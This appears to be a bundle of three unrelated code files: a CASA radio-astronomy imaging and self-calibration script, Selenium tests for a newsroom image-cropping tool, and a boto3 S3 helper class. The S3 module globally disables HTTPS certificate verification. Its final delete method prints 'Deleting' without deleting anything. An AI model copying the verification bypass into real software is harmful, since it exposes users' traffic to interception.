# (os, tclean, impbcor, exportfits, gaincal, plotcal, applycal) and on
# `full_vis` / `phasecal`, which are presumably defined earlier in the
# session — confirm before running standalone.
line_vis = vis = '16B-202.sb32532587.eb32875589.57663.07622001157.ms'
# --- Image spectral window 40 only (skipped if the pbcor FITS already exists) ---
imagename = myimagebase = output = 'J1922+1530_spw40'
if not os.path.exists(imagename+".image.pbcor.fits"):
    # Remove stale tclean products so the run starts clean.
    os.system('rm -rf ' + output + '*/')
    tclean(vis=line_vis,
           imagename=imagename,
           field='J1922+1530',
           spw='40',
           weighting='briggs',
           robust=0.0,
           imsize=[512,512],
           cell=['0.01 arcsec'],
           threshold='50 mJy',
           niter=1000,
           gridder='mosaic',
           specmode='mfs',
           outframe='LSRK',
           savemodel='modelcolumn',
           selectdata=True)
    # Primary-beam correct and export image, pb and residual as FITS.
    impbcor(imagename=myimagebase+'.image', pbimage=myimagebase+'.pb', outfile=myimagebase+'.image.pbcor', overwrite=True)
    exportfits(imagename=myimagebase+'.image.pbcor', fitsimage=myimagebase+'.image.pbcor.fits', overwrite=True, dropdeg=True)
    exportfits(imagename=myimagebase+'.pb', fitsimage=myimagebase+'.pb.fits', overwrite=True, dropdeg=True)
    exportfits(imagename=myimagebase+'.residual', fitsimage=myimagebase+'.residual.fits', overwrite=True, dropdeg=True)
# --- Same imaging run over all spectral windows ---
imagename = myimagebase = output = 'J1922+1530_allspw'
if not os.path.exists(imagename+".image.pbcor.fits"):
    os.system('rm -rf ' + output + '*/')
    tclean(vis=line_vis,
           imagename=imagename,
           field='J1922+1530',
           spw='',
           weighting='briggs',
           robust=0.0,
           imsize=[512,512],
           cell=['0.01 arcsec'],
           threshold='50 mJy',
           niter=1000,
           gridder='mosaic',
           specmode='mfs',
           outframe='LSRK',
           savemodel='modelcolumn',
           selectdata=True)
    impbcor(imagename=myimagebase+'.image', pbimage=myimagebase+'.pb', outfile=myimagebase+'.image.pbcor', overwrite=True)
    exportfits(imagename=myimagebase+'.image.pbcor', fitsimage=myimagebase+'.image.pbcor.fits', overwrite=True, dropdeg=True)
    exportfits(imagename=myimagebase+'.pb', fitsimage=myimagebase+'.pb.fits', overwrite=True, dropdeg=True)
    exportfits(imagename=myimagebase+'.residual', fitsimage=myimagebase+'.residual.fits', overwrite=True, dropdeg=True)
# --- Phase-only self-calibration using the model written by tclean above ---
os.system('rm -rf J1922+1530_selfcal_phase.cal')
gaincal(vis=vis, caltable="J1922+1530_selfcal_phase.cal", field="J1922+1530",
        solint='int', calmode="p", refant="", gaintype="G")
# Inspect the phase solutions per antenna (all spws, then spw 40 only).
plotcal(caltable="J1922+1530_selfcal_phase.cal",
        xaxis="time", yaxis="phase", subplot=331,
        iteration="antenna", plotrange=[0,0,-30,30], markersize=5,
        fontsize=10.0,)
plotcal(caltable="J1922+1530_selfcal_phase.cal",
        xaxis="time", yaxis="phase", subplot=331,
        iteration="antenna", plotrange=[0,0,-30,30], markersize=5,
        fontsize=10.0, spw='40')
# Apply the full calibration chain (plus new selfcal table) to the phasecal.
applycal(vis=full_vis,
         field=phasecal,
         gaintable=['cal_all_spws.gaincurve','cal_all_spws.K0',
                    'cal_all_spws.B0_nopoly','cal_all_spws.G1inf','cal_all_spws.G2',
                    'cal_all_spws.F3inc', 'J1922+1530_selfcal_phase.cal'],
         gainfield=['',phasecal,phasecal,phasecal,phasecal,phasecal,phasecal,phasecal],
         interp=['','','nearest','nearest','linearPD,linear','linearPD,linear','','linearPD,linear'],
         #spwmap=[[], [], [], spwmap, spwmap, spwmap, []],
         parang=False,calwt=False)
#only do this after sanity-checking...
# applycal(vis=full_vis,field=source,
#          gaintable=['cal_all_spws.gaincurve','cal_all_spws.K0',
#                     'cal_all_spws.B0_nopoly','cal_all_spws.G1inf','cal_all_spws.G2',
#                     'cal_all_spws.F3inc', 'J1922+1530_selfcal_phase.cal'],
#          gainfield=['',phasecal,phasecal,phasecal,phasecal,phasecal,phasecal,phasecal],
#          interp=['','','nearest','nearest','linearPD,linear','linearPD,linear','','linearPD,linear'],
#          #spwmap=[[], [], [], spwmap, spwmap, spwmap, []],
#          parang=False,calwt=False)
|
# coding: utf8
from selenium.webdriver.common.keys import Keys
import gocept.httpserverlayer.wsgi
import gocept.selenium
import unittest
import zeit.cms.testing
import zeit.content.image.testing
import zeit.imp.tests
# Test-layer stack (innermost first): WSGI app -> real HTTP server ->
# webdriver browser session -> Selenese-compatible API on top of webdriver.
WSGI_LAYER = zeit.cms.testing.WSGILayer(
    name='WSGILayer', bases=(zeit.imp.tests.imp_layer,))
HTTP_LAYER = gocept.httpserverlayer.wsgi.Layer(
    name='HTTPLayer', bases=(WSGI_LAYER,))
WD_LAYER = gocept.selenium.WebdriverLayer(
    name='WebdriverLayer', bases=(HTTP_LAYER,))
WEBDRIVER_LAYER = gocept.selenium.WebdriverSeleneseLayer(
    name='WebdriverSeleneseLayer', bases=(WD_LAYER,))
class Selenium(zeit.cms.testing.SeleniumTestCase):
    """Base test case: opens the image cropper (imp) on a fresh image group."""
    layer = WEBDRIVER_LAYER
    # Browser window geometry used for all tests in this module.
    window_width = 1100
    window_height = 600
    def setUp(self):
        super(Selenium, self).setUp()
        self.create_group()
        self.open_imp()
    def create_group(self):
        # Creates /repository/group with a master image for cropping.
        zeit.content.image.testing.create_image_group_with_master_image()
    def open_imp(self):
        self.open('/repository/group/@@imp.html')
class SeleniumBasicTests(Selenium):
    """Smoke tests: mask selection, border choice, dragging, zooming and
    mask-string parsing in the imp JavaScript widget."""
    def test_generic_load(self):
        self.selenium.assertTextPresent(u'450×200')
    def test_crop_mask(self):
        s = self.selenium
        # s.comment('After clicking on the mask choice the image is loaded')
        self.click_label(u"450×200")
        s.verifyAttribute(
            'id=imp-mask-image@src',
            '*&mask_width=450&mask_height=200&border=')
        # s.comment('The border will be passed')
        # Label is German for "gray border"; selecting it adds a border color.
        self.click_label("grauer Rahmen")
        s.verifyAttribute(
            'id=imp-mask-image@src',
            '*&mask_width=450&mask_height=200&border=%23888888')
    def test_border_select_wo_selected_mask_does_not_fail(self):
        s = self.selenium
        # "schwarzer Rahmen" = "black border"; chosen before any mask exists.
        self.click_label("schwarzer Rahmen")
        s.verifyElementNotPresent('id=imp-mask-image')
        self.click_label(u"450×200")
        s.verifyAttribute(
            'id=imp-mask-image@src',
            '*&mask_width=450&mask_height=200&border=%23000000')
    def test_image_dragging(self):
        s = self.selenium
        pos = self.eval('window.document.imp.get_image_position()')
        self.assertEqual(1, pos['x'])
        self.assertEqual(1, pos['y'])
        s.pause(500)  # XXX What should we be waiting for here?
        # Dragging the mask by (30, 100) should shift the image accordingly.
        s.dragAndDrop('id=imp-mask', '30,100')
        pos = self.eval('window.document.imp.get_image_position()')
        self.assertEqual(31, pos['x'])
        self.assertEqual(101, pos['y'])
    def test_mask_string_parse(self):
        s = self.selenium
        # s.comment('Simple dimensions')
        s.runScript(
            'window.document.imp.set_mask("500x200/500/200")')
        s.verifyEval('window.document.imp.mask_dimensions.w', '500')
        s.verifyEval('window.document.imp.mask_dimensions.h', '200')
        s.verifyEval('window.document.imp.name', '"500x200"')
        # s.comment('The dimensions can be variable, indicated by a ?')
        s.runScript(
            'window.document.imp.set_mask("art-200/?500/200")')
        s.verifyEval('window.document.imp.mask_dimensions.w', '500')
        s.verifyEval('window.document.imp.mask_dimensions.h', '200')
        s.verifyEval('window.document.imp.mask_variable.w', 'true')
        s.verifyEval('window.document.imp.mask_variable.h', 'false')
        s.verifyEval('window.document.imp.name', '"art-200"')
        s.runScript('window.document.imp.set_mask("foo/?500/?200")')
        s.verifyEval('window.document.imp.mask_dimensions.w', '500')
        s.verifyEval('window.document.imp.mask_dimensions.h', '200')
        s.verifyEval('window.document.imp.mask_variable.w', 'true')
        s.verifyEval('window.document.imp.mask_variable.h', 'true')
        s.verifyEval('window.document.imp.name', '"foo"')
    def test_zoom_slider(self):
        s = self.selenium
        # s.comment('Zooming works with a slider')
        s.verifyEval('window.document.imp.zoom>1', 'false')
        s.clickAt('id=imp-zoom-slider', '500,0')
        s.waitForEval('window.document.imp.zoom>1', 'true')
    def test_zoom_mouse_wheel(self):
        # Wheel up zooms past 1, wheel down goes below 1 but above the start.
        zoom = float(self.eval('window.document.imp.zoom.toPrecision(3)'))
        self.zoom_with_wheel(10000)
        self.assertGreater(self.eval('window.document.imp.zoom'), 1)
        self.zoom_with_wheel(-9000)
        self.assertLess(self.eval('window.document.imp.zoom'), 1)
        self.assertGreater(self.eval('window.document.imp.zoom'), zoom)
    def test_zoom_with_mouse_wheel_updates_slider(self):
        s = self.selenium
        s.verifyEval('window.document.imp_zoom_slider.get_value()>1', 'false')
        self.zoom_with_wheel(10000)
        s.verifyEval('window.document.imp_zoom_slider.get_value()>1', 'true')
    def zoom_with_wheel(self, delta_y):
        # Helper: synthesize a DOMMouseScroll event with the given wheel delta.
        self.selenium.runScript("""\
var evt = window.document.createEvent('MouseEvents')
evt.initEvent('DOMMouseScroll', false, false)
evt.wheelDeltaX = 0;
evt.wheelDeltaY = %s;
window.document.getElementById('imp-mask').dispatchEvent(evt)
""" % delta_y)
class SeleniumCropTests(Selenium):
    """Tests for the crop button: with/without a mask, out-of-bounds cases,
    snapping, and the zoom slider's mask-dependent minimum."""
    def test_crop_wo_mask(self):
        s = self.selenium
        s.verifyElementNotPresent('css=#imp-image-bar > div')
        # s.comment('Nothing happens when the crop button is clicked.')
        s.click('crop')
        s.verifyElementNotPresent('css=#imp-image-bar > div')
    def test_crop(self):
        s = self.selenium
        s.verifyElementNotPresent('css=#imp-image-bar > div')
        s.verifyElementNotPresent('css=label.cropped')
        s.dragAndDrop('id=imp-mask', '-30,-100')
        self.click_label(u"450×200")
        s.click('crop')
        # s.comment('After cropping the image is inserted in the image bar')
        s.waitForElementPresent('css=#imp-image-bar > div')
        # s.comment('The label is marked as "cropped"')
        s.verifyElementPresent('css=label.cropped')
    def test_crop_outside_mask(self):
        # Since VIV-500 we need to trouble ourselves a bit to produce such a
        # scenario: Zoom in, drag it off-center, zoom out again. As the center
        # is somewhat preserved by zooming operations, the image will be moved
        # outside the mask afterwards.
        s = self.selenium
        s.verifyElementNotPresent('css=#imp-image-bar > div')
        s.verifyElementNotPresent('css=label.cropped')
        self.click_label(u"140×140")
        s.clickAt('id=imp-zoom-slider', '500,0')
        s.dragAndDrop('id=imp-mask', '+500,+500')
        s.clickAt('id=imp-zoom-slider', '1,0')
        s.click('crop')
        # German alert text: "The image is not ..." — crop must be refused.
        s.verifyAlert('Das Bild ist nicht*')
        s.verifyElementNotPresent('css=#imp-image-bar > div')
    def test_drag_outside_mask_snaps_to_mask(self):
        # As it snaps to the mask we can crop the image and no alert is
        # generated.
        s = self.selenium
        self.click_label(u"450×200")
        s.dragAndDrop('id=imp-mask', '+1000,+1000')
        s.click('crop')
        s.waitForElementPresent('css=#imp-image-bar > div')
    def test_zoom_slider_has_minimum_of_mask_size(self):
        s = self.selenium
        # Put the zoom slider somewhere else than the minimum,
        self.click_label(u"450×200")
        s.clickAt('id=imp-zoom-slider', '500,0')
        # then select another mask
        self.click_label(u"140×140")
        # Assert that the slider is at the minimum value
        self.wait_for_condition(
            'window.jQuery("#imp-zoom-slider div").position().left == 0')
        zoom = self.eval('document.imp_zoom_slider.get_value()')
        self.assertTrue(str(zoom).startswith('0.09'))
class SeleniumMaskTests(Selenium):
    """Tests for the mask width/height input fields: enable/disable state,
    keyboard editing, and how mask selection positions the crop area."""
    def test_input_fields_show_mask_size(self):
        s = self.selenium
        self.click_label(u"450×200")
        s.verifyValue('mask-w', '450')
        s.verifyValue('mask-h', '200')
        self.click_label(u"210×210")
        s.verifyValue('mask-w', '210')
        s.verifyValue('mask-h', '210')
    def test_input_fields_disabled_for_fixed_mask(self):
        s = self.selenium
        self.click_label(u"450×200")
        form = "window.document.getElementById('imp-configuration-form')"
        s.verifyEval("%s['mask-w'].disabled" % form, 'true')
        s.verifyEval("%s['mask-h'].disabled" % form, 'true')
    def test_input_fields_initally_disabled(self):
        s = self.selenium
        form = "window.document.getElementById('imp-configuration-form')"
        s.verifyEval("%s['mask-w'].disabled" % form, 'true')
        s.verifyEval("%s['mask-h'].disabled" % form, 'true')
    def test_input_field_enabled_for_variable_mask(self):
        s = self.selenium
        # "Artikelbild breit" (wide article image) has a variable height.
        self.click_label("Artikelbild breit")
        form = "window.document.getElementById('imp-configuration-form')"
        s.verifyEval("%s['mask-w'].disabled" % form, 'true')
        s.verifyEval("%s['mask-h'].disabled" % form, 'false')
    def test_input_field_changes_are_reflected_in_the_mask(self):
        s = self.selenium
        self.click_label("Artikelbild breit")
        s.verifyEval('window.document.imp.mask_dimensions.h', '200')
        # Clear the 3-digit value, then type a new height and press enter.
        for i in range(3):
            s.type('mask-h', Keys.BACKSPACE)
        s.type('mask-h', '280\n')
        s.verifyEval('window.document.imp.mask_dimensions.h', '280')
    def test_input_field_up_arrow_once_increases_by_1(self):
        self.verify_press(Keys.ARROW_UP, '201')
    def test_input_field_down_arrow_once_decreases_by_1(self):
        self.verify_press(Keys.ARROW_DOWN, '199')
    def test_input_field_left_arrow_once_decreases_by_1(self):
        self.verify_press(Keys.ARROW_LEFT, '199')
    def test_input_field_right_arrow_once_increases_by_1(self):
        self.verify_press(Keys.ARROW_RIGHT, '201')
    def verify_press(self, key_code, expected_value):
        # Helper: press one key in the height field and check the new value.
        s = self.selenium
        self.click_label("Artikelbild breit")
        s.verifyEval('window.document.imp.mask_dimensions.h', '200')
        s.keyDown('mask-h', key_code)
        # XXX selenium.webdriver implements both keyDown and keyUp as
        # "sendKeys", which results in two presses, sigh.
        # s.keyUp('mask-h', key_code)
        s.verifyEval('window.document.imp.mask_dimensions.h', expected_value)
    @unittest.skip('python webdriver bindings cannot hold down keys')
    def test_input_field_up_arrow_hold_increases(self):
        self.verify_hold(Keys.ARROW_UP, '>210')
    @unittest.skip('python webdriver bindings cannot hold down keys')
    def test_input_field_down_arrow_hold_decreases(self):
        self.verify_hold(Keys.ARROW_DOWN, '<190')
    @unittest.skip('python webdriver bindings cannot hold down keys')
    def test_input_field_left_arrow_hold_decreases(self):
        self.verify_hold(Keys.ARROW_LEFT, '<190')
    @unittest.skip('python webdriver bindings cannot hold down keys')
    def test_input_field_right_arrow_hold_increases(self):
        self.verify_hold(Keys.ARROW_RIGHT, '>210')
    def verify_hold(self, key_code, expected_value):
        # Helper: hold a key for 5s; expected_value is a JS comparison suffix.
        s = self.selenium
        self.click_label("Artikelbild breit")
        s.verifyEval('window.document.imp.mask_dimensions.h', '200')
        s.keyDown('mask-h', key_code)
        s.pause(5000)
        s.keyUp('mask-h', key_code)
        s.verifyEval(
            'window.document.imp.mask_dimensions.h %s' % expected_value,
            'true')
    def test_mask_select_should_fit_image_into_mask_x(self):
        s = self.selenium
        self.click_label('Artikelbild breit')
        s.verifyEval('window.document.imp.mask_dimensions.w', '410')
        s.verifyEval('window.document.imp.mask_dimensions.h', '200')
        # X fits
        s.verifyEval('window.document.imp.get_crop_arguments().x1', '0')
        s.verifyEval('window.document.imp.get_crop_arguments().x2', '410')
        # Y is aligned middle
        y1 = s.getEval('window.document.imp.get_crop_arguments().y1')
        y2 = s.getEval('window.document.imp.get_crop_arguments().y2')
        self.assertIn(y1, ('53', '54'))  # Rounding issues
        self.assertIn(y2, ('253', '254'))  # Rounding issues
    def test_mask_select_should_fit_image_into_mask_y(self):
        s = self.selenium
        self.click_label('Audio')
        s.verifyEval('window.document.imp.mask_dimensions.w', '180')
        s.verifyEval('window.document.imp.mask_dimensions.h', '180')
        # X is aligned centered
        s.verifyEval('window.document.imp.get_crop_arguments().x1', '30')
        s.verifyEval('window.document.imp.get_crop_arguments().x2', '210')
        # Y fits
        s.verifyEval('window.document.imp.get_crop_arguments().y1', '0')
        s.verifyEval('window.document.imp.get_crop_arguments().y2', '180')
class ResizeTests(Selenium):
    """Tests that mask, image position and zoom slider react to browser
    window resizes and sidebar toggling."""
    # Smaller window than the base class so there is room to grow.
    window_width = 1000
    window_height = 800
    def setUp(self):
        super(ResizeTests, self).setUp()
        # Choose a mask
        self.click_label(u"450×200")
    def test_window_resize_updates_mask(self):
        s = self.selenium
        # Store the current mask image dimensions
        width = int(s.getEval('window.document.imp.mask_image_dimensions.w'))
        height = int(s.getEval('window.document.imp.mask_image_dimensions.h'))
        # Increase the window width affects mask, try width only first:
        s.setWindowSize(1200, 800)
        s.waitForEval(
            "window.document.imp.mask_image_dimensions.w > %d" % width,
            'true')
        self.assertEqual(
            height,
            int(s.getEval("window.document.imp.mask_image_dimensions.h")))
        # change width and height:
        s.setWindowSize(800, 900)
        s.pause(100)
        s.waitForEval(
            "window.document.imp.mask_image_dimensions.w < %d" % width,
            'true')
        self.assertTrue(
            int(s.getEval("window.document.imp.mask_image_dimensions.h"))
            > height)
    def test_window_resize_moves_image(self):
        # When the area changes it's size the crop area remains centered. This
        # means we must move the image to not change the current view. That
        # means that after changing the size, the crop parameters remain the
        # same.
        s = self.selenium
        get_crop_args = ('window.MochiKit.Base.serializeJSON('
                         '    window.document.imp.get_crop_arguments())')
        crop_args = self.eval(get_crop_args)
        s.setWindowSize(900, 900)
        s.pause(500)
        self.assertEqual(crop_args, self.eval(get_crop_args))
        # Try another one, to be sure this works multiple times
        s.setWindowSize(1000, 800)
        s.pause(500)
        self.assertEqual(crop_args, self.eval(get_crop_args))
    def test_window_resize_updates_zoom_slider(self):
        # The zoom slider doesn't automatically support size updates.
        s = self.selenium
        max_left = s.getEval(
            'window.document.imp_zoom_slider.zoom_slider._maxLeft')
        s.setWindowSize(800, 900)
        s.waitForEval(
            'window.document.imp_zoom_slider.zoom_slider._maxLeft < %s' %
            max_left, 'true')
    def test_sidebar_switch_sends_resize_event(self):
        # The sidebar can be switched on/off. This obiously doesn't send an
        # onresize event to the window. We must support this nevertheless.
        s = self.selenium
        max_left = s.getEval(
            'window.document.imp_zoom_slider.zoom_slider._maxLeft')
        s.click('id=sidebar-dragger')
        s.pause(50)
        s.waitForEval(
            'window.document.imp_zoom_slider.zoom_slider._maxLeft > %s' %
            max_left, 'true')
        # Clicking again resets to the original state
        s.click('id=sidebar-dragger')
        s.pause(50)
        s.waitForEval(
            'window.document.imp_zoom_slider.zoom_slider._maxLeft == %s' %
            max_left, 'true')
class FilterTests(Selenium):
    """Selenium tests for the color/contrast/brightness/sharpness sliders
    and the step <-> value <-> filter-factor mapping helpers."""
    def test_value_mapper(self):
        """Spot-check the JS slider-step/value/filter conversion functions."""
        s = self.selenium
        def verify_mappers(step, value, filter):
            # Round-trip one (step, value, filter) triple through the
            # JS conversion helpers.
            s.waitForNotEval(
                'typeof(window.document.imp_color_filter)', 'undefined')
            s.verifyEval(
                'window.document.imp_color_filter.to_value(%s)' % step,
                str(value))
            s.verifyEval(
                'window.document.imp_color_filter.to_step(%s)' % value,
                str(step))
            s.verifyEval(
                'window.document.imp_color_filter.to_filter(%s)' % value,
                str(filter))
        # Samples at both ends, the neutral midpoint (value 0 -> factor 1)
        # and two interior points.
        verify_mappers(0, -100, 0.75)
        verify_mappers(600, -40, 0.9)
        verify_mappers(1000, 0, 1)
        verify_mappers(1800, 80, 2)
        verify_mappers(2000, 100, 2.25)
    def test_brightness_slider(self):
        self.verify_slider('brightness')
    @unittest.skip('No idea why this slider does not move on click')
    def test_contrast_slider(self):
        self.verify_slider('contrast')
    @unittest.skip('No idea why this slider does not move on click')
    def test_color_slider(self):
        self.verify_slider('color')
    def test_sharpness_slider(self):
        self.verify_slider('sharpness')
    def verify_slider(self, name):
        """Exercise the filter slider *name*: click both ends, check the
        bound input field and crop argument, then reset."""
        s = self.selenium
        selector = 'css=*[id="filter.%s"] .uislider' % name
        s.waitForElementPresent(selector)
        # Clicking 0 yields 0.75 as value and changes the image url
        image_url = s.getEval('window.document.imp.image.src')
        s.clickAt(selector, '1,0')
        s.verifyValue('filter.%s.input' % name, '-100')
        s.verifyEval(
            "window.document.imp.crop_arguments['filter.%s']" % name, '0.75')
        s.waitForEval(
            "window.document.imp.image.src == '%s'" % image_url, 'false')
        # Clicking > 0 increases the value:
        s.clickAt(selector, '100,0')
        s.verifyEval(
            "new Number(window.document.getElementById("
            " 'filter.%s.input').value) > -100" % name,
            'true')
        s.verifyEval(
            "window.document.imp.crop_arguments['filter.%s'] != 0" % name,
            'true')
        # clicking reset sets the slider back to 0 (filter becomes 1 then)
        s.click('reset')
        s.verifyEval(
            "window.document.imp.crop_arguments['filter.%s']" % name, '1')
class ContentZoomTest(Selenium):
    """Selenium test for the content-zoom toggle button."""
    def test_zoom(self):
        """Toggling twice adds, then removes, the imp-zoomed-content class."""
        s = self.selenium
        s.verifyElementNotPresent('css=#content.imp-zoomed-content')
        s.click('id=imp-content-zoom-toggle')
        s.verifyElementPresent('css=#content.imp-zoomed-content')
        s.click('id=imp-content-zoom-toggle')
        s.verifyElementNotPresent('css=#content.imp-zoomed-content')
|
import boto3
from botocore.client import Config
from boto3.s3.transfer import TransferConfig
import os
import tarfile
import shutil
import wget
import ssl
from pathlib import Path
# NOTE(review): this globally disables HTTPS certificate verification for
# every urllib-based download in this process (used here so wget can fetch
# the CA bundle below). It weakens TLS security process-wide — consider
# scoping verification off only for that single download.
ssl._create_default_https_context = ssl._create_unverified_context
def soft_connection(func):
    """
    Decorator that catches intermittent disconnections with S3.

    The wrapped call is attempted once; on any exception the error is
    printed and ``None`` is returned instead of propagating, so a flaky
    upload does not abort a long-running training job.
    """
    import functools  # stdlib; preserves the wrapped function's metadata
    @functools.wraps(func)
    def try_connect(*args, **kwargs):
        try:
            result = func(*args, **kwargs)
        except Exception as e:
            # Best-effort by design: log and swallow so callers continue.
            print("S3 UPLOAD FAILURE", e)
            result = None
        return result
    return try_connect
class S3Handler:
    """Convenience wrapper around a boto3 S3 client for a training pipeline.

    Holds the bucket / data-folder / model-folder configuration and offers
    upload, download, listing and deletion helpers on top of it. Uploads go
    through the ``soft_connection`` decorator, so intermittent S3 failures
    are printed instead of raised.

    NOTE(review): object keys are assembled with ``os.path.join`` throughout,
    which only yields '/'-separated S3 keys on POSIX hosts — confirm this
    code never runs on Windows.
    """
    def __init__(self, endpoint_url, aws_access_key_id,
                 aws_secret_access_key, signature_version,
                 region_name, s3bucket,
                 s3_data_folder,
                 s3_model_folder,
                 exp_name='NO_NAMED_EXPERIMENT',
                 upload_multi_part=False,
                 training=False,
                 cert_path=None):
        """Create the S3 client and remember the bucket/folder settings.

        :param upload_multi_part: if True, upload with 5 concurrent parts;
            otherwise multipart is effectively disabled via a 20 GB threshold.
        :param training: if True, uploaded files are nested under *exp_name*.
        :param cert_path: optional CA bundle; when the path does not exist
            locally it is treated as a URL, downloaded with wget, and the
            downloaded file name is used for TLS verification.
        """
        if upload_multi_part:
            self.config = TransferConfig(max_concurrency=5)
        else:
            GB = 1024 ** 3
            # Threshold far above any artifact size => single-part uploads.
            self.config = TransferConfig(multipart_threshold=20*GB)
        if cert_path:
            if not os.path.exists(cert_path):
                wget.download(cert_path)
                cert_path = Path(cert_path).name
            self.s3 = boto3.client('s3',
                        endpoint_url=endpoint_url,
                        aws_access_key_id=aws_access_key_id,
                        aws_secret_access_key=aws_secret_access_key,
                        config=Config(signature_version=signature_version),
                        region_name=region_name,
                        verify=cert_path)
        else:
            self.s3 = boto3.client('s3',
                        endpoint_url=endpoint_url,
                        aws_access_key_id=aws_access_key_id,
                        aws_secret_access_key=aws_secret_access_key,
                        config=Config(signature_version=signature_version),
                        region_name=region_name)
        self.exp_name = exp_name
        self.training = training
        if self.exp_name == 'NO_NAMED_EXPERIMENT' and self.training:
            print('WARNING: EXP_NAME NOT IN YAML')
        self.bucket = s3bucket
        self.data_folder = s3_data_folder
        self.model_folder = s3_model_folder
    def download_file(self, localfile, bucket=None, s3path=None, output_dir='/workspace'):
        """Download ``s3path/localfile`` from *bucket* into *output_dir*.

        *s3path* may be the literal strings 'model' or 'data' to select the
        configured model/data folders.
        """
        bucket = bucket if bucket else self.bucket
        if s3path == 'model':
            s3path = self.model_folder
        if s3path == 'data':
            s3path = self.data_folder
        # Bug fix: the log line previously concatenated s3path and localfile
        # with no separator, misreporting the key that is actually fetched.
        print("S3 Download s3://" + bucket + "/" + os.path.join(s3path, localfile) + " to " + os.path.join(output_dir, localfile))
        self.s3.download_file(bucket, os.path.join(s3path, localfile), os.path.join(output_dir, localfile))
    def download_all_files_with_ext(self, bucket=None, s3path=None, ext=None, output_dir='ai_plat_output/'):
        """Download every object directly under *s3path* whose extension is
        in *ext* (default: ['.pth', '.log', '.json', '.0']).
        """
        # Avoid a shared mutable default argument; None means "use defaults".
        if ext is None:
            ext = ['.pth', '.log', '.json', '.0']
        bucket = bucket if bucket else self.bucket
        if s3path == 'model':
            s3path = self.model_folder
        if s3path == 'data':
            s3path = self.data_folder
        response = self.s3.list_objects_v2(Bucket=bucket, Prefix=s3path, Delimiter='/')
        print (f"SCANNING {s3path}")
        if 'Contents' not in response:
            print ("No items inside")
        else:
            for item in response['Contents']:
                print (os.path.splitext(item['Key']))
                if os.path.splitext(item['Key'])[-1] in ext:
                    _, localfile = os.path.split(item['Key'])
                    os.makedirs(output_dir, exist_ok=True)
                    self.download_file(localfile=localfile, bucket=bucket, s3path=s3path, output_dir=output_dir)
    @soft_connection
    def upload_file(self, localfile, bucket=None, s3path=None, file_tail=False):
        """
        :param localfile: the file to be uploaded
        :param bucket: use S3Handler bucket unless stated otherwise
        :param s3path: use S3Handler s3path unless stated otherwise
        :param file_tail: remove directory overheads like "/workspace/abcdefg/file_name" to "file_name"
        """
        if file_tail:
            head, output_file = os.path.split(localfile)
        else:
            output_file = localfile
        bucket = bucket if bucket else self.bucket
        if s3path == 'model':
            s3path = self.model_folder
        if s3path == 'data':
            s3path = self.data_folder
        if self.training:
            # Nest training artifacts under the experiment name.
            output_file = os.path.join(self.exp_name, output_file)
        print("S3 Uploading " + localfile + " to s3://" + bucket + '/' + s3path + '/' + output_file)
        self.s3.upload_file(localfile, bucket, os.path.join(s3path, output_file), Config=self.config)
    def upload_folder(self, folder, bucket=None, s3path=None, file_tail=False, accepted_ext=None):
        """
        uses self.upload_file to upload_folder
        :param folder: the folder to be uploaded
        :param bucket: use S3Handler bucket unless stated otherwise
        :param s3path: use S3Handler s3path unless stated otherwise
        :param file_tail: remove directory overheads like "/workspace/abcdefg/file_name" to "file_name"
        :param accepted_ext: upload only files with this LIST of extensions
        """
        def _splitext(file):
            # Treat double extensions (.tar.gz/.tar.bz2) as one extension.
            for ext in ['.tar.gz', '.tar.bz2']:
                if file.endswith(ext):
                    return file[:-len(ext)], file[-len(ext):]
            return os.path.splitext(file)
        from glob import glob
        print("Processing folder")
        for file in glob(folder + "/**/*", recursive=True):
            if not (os.path.isdir(file)):
                if accepted_ext is not None:
                    _, file_ext = _splitext(file)
                    if file_ext not in accepted_ext:
                        print(f"Rejecting {file}")
                        continue
                print(f"Processing {file}")
                self.upload_file(bucket=bucket, localfile=file, s3path=s3path, file_tail=file_tail)
    def upload_model_folder(self, bucket=None, s3path=None):
        """Upload the default model/output folders under
        training_classification_output/<exp_name>.

        NOTE(review): the *s3path* parameter is overwritten inside the loop
        and therefore ignored — confirm whether that is intended.
        """
        # [model_paths, clearml args]
        output_dir = ['/workspace/output/faster_rcnn_RoITrans_r50_fpn_1x_dota1_5/',
                      '/workspace/outputs/']
        for folder in output_dir:
            s3path = os.path.join('training_classification_output', self.exp_name)
            self.upload_folder(folder, bucket, s3path, file_tail=True)
    def print_folders(self, bucket=None, prefix=None):
        """Print the objects under each prefix in *prefix* (one level deep),
        then the bucket's top-level common prefixes."""
        # Avoid a shared mutable default argument; None means "use defaults".
        if prefix is None:
            prefix = ['data/', 'model/', 'training_classification_output/']
        bucket = bucket if bucket else self.bucket
        for index_prefix in prefix:
            response = self.s3.list_objects_v2(Bucket=bucket, Prefix=index_prefix, Delimiter='/')
            print (f"SCANNING {index_prefix}")
            if 'Contents' not in response:
                # No direct objects: descend one level into sub-prefixes.
                if 'CommonPrefixes' in response:
                    prefix_list = [item['Prefix'] for item in response['CommonPrefixes']]
                    for prefix in prefix_list:
                        print (prefix)
                        response = self.s3.list_objects_v2(Bucket=bucket, Prefix=prefix, Delimiter='/')
                        if 'Contents' in response:
                            for item in response['Contents']:
                                print (item['Key'])
                else:
                    print (f"No items inside in {index_prefix}")
            else:
                for item in response['Contents']:
                    print (item['Key'])
        print ("Common Prefixes: ")
        response = self.s3.list_objects_v2(Bucket=bucket, Delimiter='/')
        for prefix in response['CommonPrefixes']:
            print (prefix['Prefix'])
    def delete_file(self, filename, bucket=None):
        """Delete every top-level object whose basename equals *filename*.

        NOTE(review): S3 keys normally do not start with '/', so listing with
        Prefix='/' may return nothing — confirm against this bucket's layout.
        """
        bucket = bucket if bucket else self.bucket
        response = self.s3.list_objects_v2(Bucket=bucket, Prefix='/', Delimiter='/')
        if 'Contents' not in response:
            print ("No items inside")
        else:
            for dict_obj in response['Contents']:
                item = dict_obj['Key']
                head, output_file = os.path.split(item)
                if output_file == filename:
                    print(f"Deleting {item}")
                    print (self.s3.delete_object(Bucket=bucket, Key=item))
    def delete_trained_folder(self, bucket=None, s3path='/', ext=None):
        """Delete objects under *s3path* whose extension is in *ext*
        (default: ['.pth', '.log', '.json', '.0'])."""
        # Avoid a shared mutable default argument; None means "use defaults".
        if ext is None:
            ext = ['.pth', '.log', '.json', '.0']
        bucket = bucket if bucket else self.bucket
        response = self.s3.list_objects_v2(Bucket=bucket, Prefix=s3path, Delimiter='/')
        if 'Contents' not in response:
            print ("No items inside")
        else:
            for dict_obj in response['Contents']:
                item = dict_obj['Key']
                _, file_ext = os.path.splitext(item)
                head, output_file = os.path.split(item)
                if file_ext in ext:
                    print(f"Deleting {item}")
